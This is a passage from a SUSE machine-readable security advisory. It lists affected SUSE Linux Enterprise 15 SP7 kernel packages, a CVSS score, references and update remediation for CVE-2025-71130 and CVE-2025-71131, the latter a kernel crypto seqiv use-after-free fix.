"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
